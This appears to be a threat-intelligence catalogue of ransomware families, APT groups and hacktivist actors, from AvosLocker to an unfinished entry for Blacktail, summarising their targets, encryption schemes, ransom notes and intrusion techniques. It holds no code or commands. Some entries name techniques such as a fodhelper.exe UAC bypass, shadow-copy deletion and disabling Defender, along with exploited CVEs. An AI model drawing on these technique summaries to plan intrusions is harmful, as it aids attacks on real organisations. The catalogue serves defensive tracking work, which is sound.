In March 2022, the FBI and the U.S. Treasury Financial Crimes Enforcement Network released a joint advisory addressing AvosLocker and their activity targeting organizations across several critical infrastructure sectors. The RaaS gang deploys ransomware onto their victims’ networks and systems, then threatens to leak their files on the dark web if they don’t pay up. AvosLocker is both the name of the RaaS gang and the name of the ransomware itself. In May 2022, AvosLocker took responsibility for attacking and stealing data from the Texas-based healthcare organization CHRISTUS Health. CHRISTUS Health runs hundreds of healthcare facilities across Mexico, the U.S., and South America. The group stole information from a cancer patient registry which included names, social security numbers, diagnoses, dates of birth, and other medical information. The nonprofit Catholic health system has more than 600 healthcare facilities in Texas, Louisiana, New Mexico, and Arkansas. There are also facilities in Colombia, Mexico, and Chile. Fortunately, the ransomware attack was quickly identified and was limited. While other healthcare organizations have not been as fortunate with ransomware attacks, the AvosLocker attack didn’t impact CHRISTUS Health’s patient care or clinical operations. CHRISTUS Health didn’t reveal whether or not the security incident included ransomware, data exfiltration or extortion, but given AvosLocker’s reputation, it is more than likely that the incident included at least one of the three.

Aw3s0m3Sc0t7

Ransomware

Awaken Likho

Awaken Likho is an APT group that has targeted Russian government agencies and industrial enterprises, employing techniques such as information gathering via search engines and using MeshCentral for remote access. The group has been active since at least December 2021 and has ramped up its activities following the Russo-Ukrainian conflict. Recent reports indicate that they are focusing on espionage against critical infrastructure in the defense and energy sectors. Analysis of their malware reveals a new version that is still in development, suggesting ongoing operational capabilities.

Aware

Aware is an active extortion or ransomware group tracked by RansomLook.

AxCrypter

Ransomware

axxes

Axxes ransomware emerged as a rebranded version of the previously known Midas ransomware group, with roots also tracing back through the Haron and Avaddon lineage. It operates via a single-extortion model, encrypting files and appending the .axxes extension. Victims receive both a “RESTORE_FILES_INFO.hta” and a “.txt” ransom note. The ransomware performs extra actions like determining the device’s geolocation, modifying the Windows Firewall, changing file extensions, and terminating processes using taskkill.exe. Its known targets span the U.S., UAE, France, and China, including at least one high-profile victim—The H Dubai hotel. This group appears financially motivated, leveraging the historical branding and code of earlier groups for its operations.

Ayyıldız Tim

Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.

aZaZeL

Ransomware

Aztroteam

Aztroteam is an active extortion or ransomware group tracked by RansomLook.

AzzaSec

AzzaSec is a hacktivist group that originated in Italy. Known for their pro-Palestine stance, they have been involved in various cyberattacks targeting Israel and pro-Israel countries. Additionally, AzzaSec has engaged in ransomware activities and has been known to collaborate with other cybercriminal groups.

B2DR Ransomware

Uses the .reycarnasi1983@protonmail.com.gw3w extension and a ransom note named ScrewYou.txt.

Babax

ransomware

babuk-bjorka

On January 26th, Babuk's dedicated leak site (DLS) was "relaunched". Bjorka (Telegram: @bjorkanesiaaaa) is the current administrator. Upon launch, the DLS was populated mainly by victims previously claimed by other groups such as RansomHub, Lockbit3, and Funksec. At this current time there is no apparent connection to the original Babuk operation besides reusing the Babuk site template and logos. The group is also known as Babuk2 by other trackers.

It is important to note that the original Babuk DLS was hosted and available up until February 26th, 2024.

Babuk-Locker

Babuk‑Locker emerged in early 2021 as a Ransomware‑as‑a‑Service (RaaS) gang targeting high‑value “big game” enterprises across sectors like healthcare, telecommunications, finance, education, and government. It initially deployed crypto-ransomware—encrypting files using ChaCha8 encryption with keys secured via elliptic‑curve Diffie‑Hellman—and later added a double‑extortion model involving data theft and leak site threats. Notable incidents include attacks on the Washington, D.C. Metropolitan Police Department and other organizations. In mid‑2021, Babuk’s source code was leaked, prompting both a fragmentation of its core operations and emergence of variants like Babuk Tortilla and Babuk V2. Affiliates exploited vulnerabilities in ESXi hypervisors to deliver destructive variants, and law enforcement actions eventually disrupted key operators.

Babuk Ransomware

Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see, such as multi-threaded encryption as well as abusing the Windows Restart Manager, similar to Conti and REvil. For its encryption scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and the Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware families that came before, it also has the ability to spread its encryption by enumerating the available network resources.

Babyduck

Babyduck is an active extortion or ransomware group tracked by RansomLook.

babylockerkz

BabyLockerKZ is a variant of MedusaLocker ransomware, first observed in late 2023. It operates under a double‑extortion model, combining file encryption with data exfiltration and extortion. Technically, it reuses MedusaLocker’s AES + RSA‑2048 hybrid encryption, appends the .hazard file extension to encrypted files, and includes a unique autorun registry key (“BabyLockerKZ”) alongside dedicated public/private key data inserted into registry values. Initial access is achieved through opportunistic methods like RDP compromises, with lateral movement facilitated by compromised credentials and tools such as Mimikatz. The variant employs a custom toolkit codenamed paid_memes, which includes tools like "Checker" for scanning credentials, facilitating automation, and bridging toolsets for further exploitation. Starting late 2022, its operators have compromised over 100 organizations per month, initially targeting European victims before shifting toward Latin America in 2023.

backmydata

BackMyData is a variant of the Phobos ransomware family, first observed in early 2024. It follows a double‑extortion model: encrypting files and threatening data exposure. The ransomware primarily targets organizations via weak or misconfigured RDP access (e.g., remote desktop services), though phishing and initial-stage payloads like SmokeLoader have also been noted. Technical behavior includes AES‑256 file encryption, with keys secured via a public RSA‑2048 key embedded in the binary. Post-infection actions involve disabling firewalls, deleting volume shadow copies, inhibiting recovery functionality, and establishing persistence through registry Run keys and startup folder entries. Encrypted files receive the extension .BACKMYDATA, and victims are left with ransom notes (info.txt, info.hta, or .backmydata) that instruct them to contact attackers via email or Session Messenger. A significant incident involved a coordinated attack on Romania’s Hipocrate Information System (HIS), impacting 26 hospitals and causing widespread system outages across nearly 100 facilities, with ransom demands of approximately 3.5 BTC (~$175,000).

Bad Rabbit

On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

Badbeeteam

ransomware

BadBlock

Ransomware

BadEncript Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

BadEncript

Ransomware

BadRory

Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged booby-trapped Office emails. Targets included government entities, military contractors, universities, and hospitals.

Bahamut

Bahamut is a threat actor primarily operating in the Middle East and Central Asia, suspected to be a private contractor to several state-sponsored actors. They have been observed conducting phishing as well as desktop and mobile malware campaigns.

BaksoCrypt

Ransomware. Based on my-Little-Ransomware.

Balbaz

Ransomware

Baliluware

Ransomware

Balletspistol

BalletsPistol is a Python-based ransomware strain distributed via GitHub. An investigative report from June 2025 reveals its delivery through a malicious ISO file hosted on a now‑removed public GitHub repository. The infection chain begins when the ISO (named Invoice.iso) is downloaded and mounted, revealing a batch script (MAIN.BAT) and supporting components—including a password-protected ZIP and a shortcut (.lnk) for execution. The malware performs privilege escalation (via a UAC bypass using fodhelper.exe), establishes persistence via the registry and scheduled tasks, and then extracts an executable from the ZIP to commence the main payload. This binary encrypts user files with a hybrid AES + RSA scheme, adding the .iDCVObno extension to encrypted files; it also drops ransom notes (RESTORE-MY-FILES.TXT or .HTA) and changes the victim’s wallpaper.

Bam!

Ransomware

BAMBOO SPIDER

Crowdstrike tracks the developer of Panda Zeus as BAMBOO SPIDER

BananaCrypt

Ransomware

BancoCrypt HT

Ransomware

Bandarchor

Ransomware. Files might be partially encrypted.

Bangladesh Financial Intelligence Unit

Bangladesh Financial Intelligence Unit (BFIU)

BANISHED KITTEN

BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.

Banks1

ransomware

Barack Obama's EBBV

Ransomware

Barack Obama's Everlasting Blue Blackmail Virus Ransomware

A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.

BarRax Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Based on HiddenTear.

Bart ransomware

Bart ransomware is distributed by the same Russian Cyber Mafia behind Dridex 220 and Locky. Bart doesn't communicate with a command and control (C&C) server, so it can encrypt files without a network connection. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript code and uses social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it harder to tell what actions they are performing. See screenshot above for an example of what they look like. If opened, these attachments download and install the intermediary loader RockLoader, which downloads Bart onto the machine over HTTPS. Once executed, it will first check the language on the infected computer. If the malware detects Russian, Belorussian, or Ukrainian, the ransomware will terminate and will not proceed with the infection. If it's any other language, it will start scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure prior to encrypting files, Bart could possibly encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.

Bart

Ransomware. Possible affiliations with RockLoader, Locky and Dridex.

Basilisque Locker

Ransomware

BASS-FES

Ransomware

BatShadow

BatShadow is a Vietnamese threat actor that targets job seekers and digital marketing professionals through social engineering campaigns, deploying the Go-based malware known as Vampire Bot. The group impersonates recruiters and distributes malicious job descriptions and corporate PDFs, triggering a multi-stage infection chain that enables remote surveillance and data theft. Analysts have linked BatShadow to Vietnam based on infrastructure reuse and targeting patterns, noting its history of using domains like samsung-work.com to distribute various malware families, including Agent Tesla and Quasar RAT. The actor employs techniques such as filename tricks and coercive browser actions to evade detection and increase the likelihood of successful compromises.

Bavacai

Bavacai is an active extortion or ransomware group tracked by RansomLook.

BazarCall

BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.

BB

Ransomware

Bearlyfy

Bearlyfy has been attributed to over 70 cyber attacks targeting Russian companies since its emergence in January 2025, employing a custom Windows ransomware strain known as GenieLocker. The group operates with dual objectives of extortion and sabotage, utilizing a modified version of PolyVice and leveraging vulnerabilities in external services and applications for initial access. Analysis reveals overlaps with PhantomCore, indicating a pro-Ukrainian interest, while Bearlyfy's attacks are characterized by minimal preparation and a focus on immediate impact through data encryption and destruction. Approximately 20% of victims reportedly pay the ransom, with demands escalating to hundreds of thousands of dollars.

Beast

Beast ransomware emerged in 2022 as an enhanced iteration of the earlier “Monster” ransomware. It operates under a Ransomware-as-a-Service (RaaS) model, offering affiliates rich customization options to create tailored binaries targeting Windows, Linux, and VMware ESXi systems. Key technical capabilities include hybrid Elliptic-Curve + ChaCha20 encryption, segmented file encryption, ZIP wrapper mode (encrypting files into zip archives with embedded ransom notes), multithreaded processing, termination of services, shadow copy deletion, hidden partition usage, and subnet scanning. Affiliates are provided configurable offline builders, enabling streamlined deployment across multiple platforms. While Beast's functional power is well-documented, details on its specific victims, sectors targeted, and leak site activity remain limited in public sources.

BeethoveN

Ransomware

Beijing Group

Beijing Group is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Belgian General Information and Security Service

ADIV/SGRS (General Intelligence and Security Service, military intelligence)

Belgian State Security Service

VSSE (State Security Service)

BelialDemon

Mentioned as operator of TriumphLoader and Matanbuchus

Belsen Group

The Belsen Group has exploited the CVE-2022-40684 vulnerability in Fortinet devices to compromise over 15,000 FortiGate firewalls, releasing detailed configurations and plaintext VPN credentials. Their leaked data, organized by country and IP address, primarily consists of configurations from FortiOS 7.0.6 and 7.2.1, which were the last vulnerable versions before patches were issued. Security researcher Kevin Beaumont confirmed that the group leveraged this vulnerability to gain unauthorized access and warned of potential exploitation of CVE-2024-55591 by similar threat actors. Fortinet has stated that the leaked data originates from older campaigns and not from any recent incidents.

Benzona

Benzona is an active extortion or ransomware group tracked by RansomLook.

Berry Sandstorm

Microsoft threat actor profile. Origin/Threat: Iran.

bert

BERT ransomware (also tracked as Water Pombero) first emerged in April 2025, rapidly targeting both Windows and Linux systems across Asia, Europe, and the U.S., with confirmed victims in healthcare, technology, electronics, and event services sectors. Its Windows variant employs a PowerShell-based loader that escalates privileges, disables Defender, UAC, and the firewall, then downloads the ransomware payload. The Linux version aggressively encrypts with up to 50 concurrent threads, forcibly shuts down VMware ESXi VMs to prevent recovery, and appends extensions like .encryptedbybert or .encrypted_by_bert. BERT uses AES encryption, and later variants feature optimized multithreading via ConcurrentQueue and DiskWorker threads. Analysts note code similarities with REvil and Babuk ESXi lockers, potentially pointing to shared development lineage or code reuse.

Best Crypt

ransomware

BestChangeRu

Ransomware

BianLian Ransomware Group

BianLian is an extortion-focused threat actor group. The group originally used double-extortion methods when it began its operations in June 2022, demanding payment in exchange for decrypting locked files while also threatening to leak exfiltrated data. U.S. & Australian cybersecurity officials observed BianLian actors shifting almost exclusively to exfiltration-focused extortion schemes in 2023.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)] **Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], CVE-2021-34473[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-34523[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-31207[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)] **PulseDive (IOCs)**: https://pulsedive.com/threat/BianLian

Bianlian

BianLian used subtle techniques to exploit, enumerate, and move laterally in victim networks to remain undetected and aggressively worked to counter Endpoint Detection & Response (EDR) protections during the encryption phase of their operations. The group has displayed signs of being new to the practical business aspects of ransomware and associated logistics. Generally they seemed to be experiencing the growing pains of a group of talented hackers new to this aspect of criminal extortion. Infrastructure associated with the BianLian group first appeared online in December 2021 and their toolset appears to have been under active development since then. Finally, we have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.

BiBiGun

A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group's TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.

bidon

BIDON is a variant of the Monti ransomware family, first observed around mid‑2023. It employs a double‑extortion strategy—encrypting victims’ files and simultaneously threatening to leak stolen data if the ransom isn’t paid. Notably, it appends the .PUUUK extension to encrypted files and drops a readme.txt ransom note outlining the extortion demands. The note offers a free decryption of two files as proof of capability and emphasizes that only authorized company personnel (e.g., top management) should engage. BIDON specifically targets corporate and enterprise organizations, not home users, and warns victims not to involve law enforcement or third-party recovery firms. It represents a shift toward more aggressive extortion tactics within the Monti lineage.

BIG PANDA

BIG PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

BigBobRoss

BigBobRoss ransomware is a cryptovirus that demands a ransom in Bitcoin to restore encrypted files, which are marked with the .obfuscated extension.

BigBossHorse

Ransomware

Biglock

ransomware

Bignosa

Bignosa is a threat actor known for launching malware campaigns targeting Australian and US organizations using phishing emails with disguised Agent Tesla attachments protected by Cassandra Protector. They compromised servers by installing Plesk and RoundCube, connected via SSH and RDP, and used advanced obfuscation methods to evade detection. Bignosa collaborated with another cybercriminal named Gods, who provided advice and assistance in their malicious activities. The actor has been linked to multiple phishing attacks and malware distribution campaigns, showcasing a high level of sophistication in their operations.

Birbware

Ransomware

BitCrypt 2.0

Ransomware

BitCrypt

Ransomware

BitCryptor

Ransomware. Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.

BitKangoroo

Ransomware

BitPaymer

In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

BitPyLock

Ransomware

BitRansomware

ransomware

Bitshifter

Ransomware

BitStak

Ransomware

BITWISE SPIDER

BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.

BizHack

ransomware

Bjorka

Bjorka is an underground actor persona that has claimed attacks on victims in a wide range of sectors and geographies. Researchers assess that the Bjorka persona is likely the administrator of a "data leak site" discovered in January 2025, which operates under the moniker "Babuk 2", ostensibly in reference to the Babuk ransomware that was highly active in the early 2020's. Researchers also assessed that much of the alleged victim data published on the site was likely recycled from previous information leaks.[[Cyjax Bjorka January 29 2025](/references/1d775a36-8b15-49f8-8c08-f92101e6d1be)]

BKRansomware

Ransomware

Bl00dy Ransomware Gang

Bl00dy self-identifies as a ransomware group. It gained attention in May 2023 for a series of data exfiltration and encryption attacks against education entities in the United States that featured exploit of vulnerabilities in PaperCut print management software, which is prevalent in the sector.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)] **Related Vulnerabilities**: CVE-2023-27350[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]

Black Basta Affiliates

This Group object reflects the tools & TTPs associated with threat actors known to deploy Black Basta, a ransomware-as-a-service (RaaS) variant that researchers believe has been used since at least April 2022. Black Basta affiliates have attacked a very wide range of targets, including organizations in at least 12 out of 16 U.S. critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.[[U.S. CISA Black Basta May 10 2024](/references/10fed6c7-4d73-49cd-9170-3f67d06365ca)] Specific pre- and post-exploit behaviors may vary among intrusions carried out by different Black Basta affiliates. TTPs associated with the Black Basta ransomware binary itself can be found in the separate dedicated Software object.

Black claw

ransomware

Black Feather

Ransomware

black nevas

BlackNevas ransomware — also referred to as “Trial Recovery” — was first observed in November 2024. It is a direct derivative of the Trigona ransomware family and continues the lineage's focus on extortion over public shaming. BlackNevas operators support a double-extortion model, encrypting files using AES-256 with RSA-4112-protected keys, and appending the .-encrypted or .ENCRYPTED file extension to affected files. Hybrid payloads are available for Windows, Linux, NAS, and VMware ESXi platforms.

While BlackNevas does not host its own data leak site, it reportedly collaborates with other ransomware groups for data publication — known partners include Kill Security, Hunters International, DragonForce, Blackout, Embargo Team, and Mad Liberator. The group has predominantly targeted large enterprises in sectors such as finance, telecommunications, manufacturing, healthcare, and legal. Initial access is commonly achieved via phishing or exploitation of vulnerabilities, with lateral movement facilitated through SMB enumeration and optional LAN-wide propagation.

Black Ruby

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine’s maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.

black suit

BlackSuit is a type of malicious software classified as ransomware. Its operation involves multifaceted extortion, encrypting and exfiltrating victim data, and hosting public data leak sites for victims who fail to meet its demands. BlackSuit’s activities first began in early May 2023. Designed to prevent access to files by encrypting them, this ransomware appends the “.blacksuit” extension to the names of all affected files. Furthermore, it changes the desktop wallpaper and creates a ransom note file named “README.BlackSuit.txt.” This threat actor targets large corporations as well as small and medium-sized enterprises (SMEs), with no apparent specific discrimination regarding industry or type of victim.

Black Witch

Black Witch is an active extortion or ransomware group tracked by RansomLook.

Blackatom

Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high-value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google’s Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel’s aerospace and defense industry.

BlackBasta

Black Basta is a new ransomware strain discovered during April 2022 (apparently in development since at least early February 2022). Due to the operators' ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along its affiliates.

blackberserk

Black Berserk is a relatively unsophisticated ransomware strain analyzed in late 2023. It operates under a single‑extortion model—encrypting files and demanding payment, with no documented abilities or threats for data exfiltration or public leaks. In observed cases, the malware appends the .Black extension to encrypted files (e.g., 1.jpg.Black) and leaves a ransom note titled Black_Recover.txt, which urges victims to make contact to negotiate payment or test decryption with benign files. The infection method appears opportunistic, delivered via isolated incidents or broad malware distribution—not linked to targeted campaigns or infrastructure. There is no evidence of it functioning as a RaaS operation or targeting any specific victim profiles or sectors.

blackbit

BlackBit ransomware was first observed in August 2022 and is a .NET-based strain that closely mimics the design and functionality of LockBit 3.0, indicating either a fork of LockBit’s leaked builder or deliberate imitation. It uses a double-extortion model, encrypting victim files and threatening to leak stolen data via a Tor-based site. BlackBit employs AES symmetric encryption for file contents and RSA asymmetric encryption for key protection, appending the .BlackBit extension to affected files. The malware also includes features for terminating processes, deleting volume shadow copies, and disabling recovery mechanisms. Initial access vectors are not comprehensively documented but are consistent with phishing, exploitation of vulnerable public-facing services, and the use of compromised credentials. Victims have been identified across various sectors, including technology, manufacturing, and professional services, though its activity level has been far lower than LockBit’s.

Blackbyte Crux

Crux is a newly identified ransomware variant active since July 2025, which claims affiliation with the established BlackByte ransomware group. It implements a double‑extortion model—encrypting files (with the .crux extension) and threatening data leak via a Tor-based portal. A distinctive feature of Crux is its execution flow: it initiates via svchost.exe, cmd.exe, and bcdedit.exe to disable Windows recovery, followed by rapid file encryption. The ransomware has been confirmed in at least three incidents across sectors including agriculture, education, professional services, media, and nonprofits, in both the U.S. and U.K. Ransom notes consistently follow the naming pattern crux_readme_[random].txt.

BlackCat Ransomware Actors & Affiliates

This object represents the BlackCat/ALPHV Ransomware-as-a-Service (“RaaS”) apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects. Researchers first observed BlackCat ransomware (AKA ALPHV or Noberus) in November 2021. An April 2022 U.S. FBI advisory linked BlackCat’s developers and money launderers to the defunct Blackmatter and Darkside ransomware operations (the latter was responsible for the major 2021 Colonial Pipeline incident).[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] As of September 2023, BlackCat is believed to be responsible for attacking organizations globally and in virtually every major sector, and it consistently claims some of the highest victim tallies of any RaaS. According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, BlackCat actors publicly claimed 233 victims in 2022, the third most of any ransomware operation in the dataset (considerably below Clop (558) but well above Hive (181)), and it already surpassed that number by July of 2023.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] Like many RaaS, BlackCat actors threaten to leak exfiltrated victim data, but they also threaten to carry out denial of service attacks if victims do not pay timely ransoms.[[BlackBerry BlackCat Threat Overview](/references/59f98ae1-c62d-460f-8d2a-9ae287b59953)] BlackCat developers have regularly evolved the namesake ransomware over time, and collaboration with affiliates means that a large number and variety of tools & TTPs are observed during intrusions involving BlackCat. 
BlackCat became the first prominent ransomware family to transition to the Rust programming language in 2022, which researchers assess provides greater customization and defense evasion capabilities and faster performance.[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)][[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] A BlackCat variant named Sphynx emerged in early 2023, featuring multiple defense evasion-focused enhancements. In Q3 2023, public reports suggested that Scattered Spider (AKA 0ktapus or UNC3944), a group attributed to several prominent intrusions involving telecommunications, technology, and casino entities, had begun to use BlackCat/Sphynx ransomware during its operations.[[Caesars Scattered Spider September 13 2023](/references/6915c003-7c8b-451c-8fb1-3541f00c14fb)][[BushidoToken Scattered Spider August 16 2023](/references/621a8320-0e3c-444f-b82a-7fd4fdf9fb67)]

BlackCat

BlackCat (ALPHV) is ransomware written in Rust. The ransomware makes heavy use of plaintext JSON configuration files to specify the ransomware functionality. BlackCat has many advanced capabilities: it can escalate privileges and bypass UAC, makes use of AES and ChaCha20 or Salsa encryption, may use the Restart Manager, can delete volume shadow copies, can enumerate disk volumes and network shares automatically, and may kill specific processes and services. The ransomware exists for Windows, Linux, and ESXi systems. Multiple extortion techniques are used by the BlackCat gang, such as exfiltrating victim data before the ransomware deployment, threats to release data if the ransom is not paid, and distributed denial-of-service (DDoS) attacks.

Blackfield

Blackfield is an active extortion or ransomware group tracked by RansomLook.

BlackFireEye

Ransomware

Blackgear

BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.

BlackHat-Mehtihack

Ransomware

Blackhunt

Black Hunt ransomware has been active since at least mid-2021 and operates under a double-extortion model, encrypting victim files and threatening public release of stolen data via a Tor-based leak site. It primarily targets organizations rather than individuals, with confirmed attacks in sectors including manufacturing, retail, technology, and local government. Encrypted files are appended with the .BlackHunt extension, and ransom notes (Restore_Data.txt) direct victims to Tor portals for negotiation. The ransomware is capable of terminating processes, deleting shadow copies, and disabling recovery functions to maximize impact. Initial access methods include exploitation of vulnerable RDP services and the use of compromised credentials from initial access brokers. While its activity level is smaller compared to major RaaS families, its leak site has featured victims from multiple countries, suggesting an international reach.

BlackJack

Blackjack, a threat actor linked to Ukraine's security apparatus, has targeted critical Russian entities such as ISPs, utilities, and military infrastructure. They have claimed responsibility for launching cyberattacks resulting in substantial damage and data exfiltration. The group allegedly used the Fuxnet malware to target sensor gateways connected to internet-connected sensors, impacting infrastructure monitoring systems. Blackjack has also been involved in attacks against companies like Moscollector, causing disruptions and stealing sensitive data.

BlackKingdom

Ransomware

BlackLock Ransomware Operators

Security researchers have described BlackLock as a "rebranding" of the Eldorado ransomware operation.[[Resecurity BlackLock March 25 2025](/references/2977c45f-3a7a-42ae-be59-378aa288dc24)] Unless otherwise noted, this object uses details from the existing "Eldorado Ransomware Operators" Group object.

Blackmeta

BLACKMETA is a pro-Palestinian hacktivist group that has claimed responsibility for a series of DDoS attacks and data breaches targeting organizations perceived as supportive of Israel, including the Internet Archive and various entities in the UAE and Saudi Arabia. The group employs DDoS attacks, website defacement, and data exfiltration, with motivations rooted in political ideology and retribution for perceived injustices against Palestinians. Their operations have been linked to a Telegram channel, where they publicize their activities and collaborate with other hacktivist groups. Additionally, they have been attributed to significant cyber disruptions, including a 100-hour DDoS campaign against a UAE bank, showcasing their operational capabilities.

BlackMist

Ransomware

BlackMoon

Ransomware

Blackout

Ransomware

BlackPink

Ransomware

BlackRose

Ransomware

BlackShades Crypter

Ransomware

BlackSheep

Ransomware

blackshrantac

aka black shrantac

blacksnake

BlackSnake is a Ransomware-as-a-Service (RaaS) operation that first appeared in August 2022, when its operators began recruiting affiliates on underground forums with an unusually low revenue share of 15%. It primarily targets home users rather than large enterprises and does not maintain a public leak site. Built on the Chaos ransomware code base, it features both file encryption and a cryptocurrency clipper module to steal funds from victims. The ransomware is developed in .NET and includes safeguards to avoid execution in Turkish or Azerbaijani environments, suggesting geographic targeting preferences. Infections result in encrypted files and ransom notes instructing victims to make contact via email for payment negotiations. The group’s operational scale and visibility remain limited compared to major RaaS families.

BlackSuit Ransomware Actors

This object reflects the ATT&CK Techniques associated with threat actors who deploy BlackSuit, a ransomware capable of running on Windows and Linux systems. BlackSuit is believed to be a successor to Royal, a ransomware operation which itself derives from the notorious Russia-based Conti gang. BlackSuit operations were first observed in May 2023, and although they were relatively low in number, U.S. authorities issued a warning for healthcare sector organizations due to the ransomware's suspected pedigree.[[HC3 Analyst Note BlackSuit Ransomware November 2023](/references/d956f0c6-d90e-49e8-a64c-a46bfc177cc6)] The number of attacks claimed by BlackSuit operators increased notably in Q2 2024.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] ATT&CK Techniques associated with the BlackSuit ransomware binary are tracked in a separate "BlackSuit Ransomware" Software object.

Blacktail

